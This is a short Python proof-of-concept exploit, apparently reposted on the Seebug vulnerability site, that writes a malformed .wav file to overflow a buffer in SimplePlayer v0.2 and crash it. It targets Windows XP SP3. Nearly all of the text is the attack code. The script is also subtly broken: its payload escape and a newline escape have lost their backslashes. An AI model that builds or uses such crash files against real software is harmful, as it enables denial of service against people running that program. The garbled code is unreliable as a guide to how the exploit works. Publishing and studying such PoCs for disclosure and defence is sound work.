#!/usr/bin/python # # Title: SimplePlayer v0.2 0day (.wav) overflow DOS Exploit # Found by: mr_me (seeleymagic [at] hotmail [dot] com) # Greetz to: Corelan Security Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT # Tested on: Windows XP SP3 # Happy New Year! # # POC: crash = ("x41" * 36000); # overwrite the buffer at 262 bytes try: file = open('mr_me_dos.wav','w'); file.write(crash); file.close(); print "[+] Created mr_me_dos.wav file" except: print "[-] Error cant write file to systemn";
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论